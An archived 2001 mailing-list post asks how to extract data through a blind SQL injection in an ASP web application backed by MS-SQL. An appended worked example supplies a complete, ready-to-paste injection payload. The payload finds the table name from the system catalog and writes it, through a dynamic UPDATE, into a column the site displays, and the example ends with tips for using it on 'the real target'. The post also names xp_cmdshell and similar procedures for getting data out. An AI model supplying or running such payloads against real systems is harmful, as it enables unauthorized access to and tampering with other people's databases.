I have a buggy web application which takes an input field and places it in the middle of an SQL query, then executes it against an MS-SQL server. I can rewrite the query because single quotes are used to encapsulate the input field, and the script doesn't strip out the single quote character. I pieced together most of the original SQL by viewing the ODBC error messages the IIS server spits out when I mangle the query:

    SELECT ? FROM ? WHERE KnownColumnName = '%input%'

The backend SQL server is behind heavy incoming and outgoing packet filters, so just using xp_cmdshell, xp_sendmail, or sp_makewebtask won't cut it. There is, however, an interface on the web site which displays certain fields from the same table that the above query selects from. If I take the output of one query and insert it into a field of this table, I could theoretically view the results by browsing this web interface.

The problem is that I don't know the name of the table that my query is working on, so I can't run an UPDATE or INSERT query until I figure that out. I went through a massive amount of common table names without much luck, so does anyone know of a method to determine the name of the table? Keep in mind that I can't actually view the results of any query, because the ASP script is treating the return value as a boolean.

Is there a way to select the object ID of the known column name from the syscolumns metatable, pass that object ID into another subselect against the sysobjects metatable to get the table name, and finally use that table as part of a final query?

-HD
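The following is an added worked example of the syscolumns/sysobjects lookup the post asks about; it is not code from the original message. It assumes a hypothetical table named Products with the known column KnownColumnName and a second column, Description, that the web interface displays; both are constructed here so the statements can be run on a scratch SQL Server 7/2000 database. On those versions syscolumns.id is the object id of the owning table and sysobjects.name is that table's name, which is exactly the join the post proposes.

```sql
-- Added example (not from the original post). Scratch table with assumed names
-- so the lookup below has something to resolve against.
CREATE TABLE Products (KnownColumnName varchar(50), Description varchar(200));
INSERT INTO Products VALUES ('widget', 'Standard widget');
INSERT INTO Products VALUES ('gadget', 'Standard gadget');

-- Step 1: resolve the table name from the known column name.
-- syscolumns.id is the object id of the table that owns the column;
-- sysobjects.name is that table's name. xtype = 'U' keeps only user tables,
-- and TOP 1 guards against the same column name existing in several tables.
DECLARE @t sysname;
SELECT TOP 1 @t = o.name
FROM sysobjects o
WHERE o.xtype = 'U'
  AND o.id IN (SELECT c.id FROM syscolumns c WHERE c.name = 'KnownColumnName');

-- Step 2 (optional, for a lab where you can see results): list the other
-- columns of that table, to find one the web interface displays.
SELECT name FROM syscolumns WHERE id = OBJECT_ID(@t) ORDER BY colid;

-- Step 3: an identifier cannot come from a variable in a static statement, so
-- the UPDATE is assembled as a string and run with EXEC. Writing @t itself into
-- the displayed column makes the table name readable through the web interface.
EXEC('UPDATE ' + @t
     + ' SET Description = ''' + @t + ''''
     + ' WHERE KnownColumnName = ''widget''');

-- Verify (in the lab only; on the target this row is read via the web page).
SELECT KnownColumnName, Description FROM Products;
-- Expected: widget | Products

-- Injection shape. Because the input lands inside single quotes and MS-SQL
-- accepts several statements in one batch separated by ';', the field value
-- below closes the quote, appends the batch from steps 1 and 3, and comments
-- out the trailing quote with '--'. The application's boolean return value
-- is irrelevant; only the side effect on the table matters.
--
--   x'; DECLARE @t sysname; SELECT TOP 1 @t = name FROM sysobjects
--   WHERE xtype = 'U' AND id IN (SELECT id FROM syscolumns
--   WHERE name = 'KnownColumnName'); EXEC('UPDATE ' + @t +
--   ' SET Description = ''' + @t + ''' WHERE KnownColumnName = ''widget'''); --
```

Two caveats when carrying this over to the real target: the login the ASP page uses must have UPDATE rights on the resolved table (reading sysobjects and syscolumns needs no special privilege on SQL Server 7/2000, but writing does), and if more than one user table carries the known column, drop the TOP 1 and write each candidate name into a separate row, or add a filter, before trusting the result.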
This archive was generated by hypermail 2b30 : Sat May 26 2001 - 23:40:05 PDT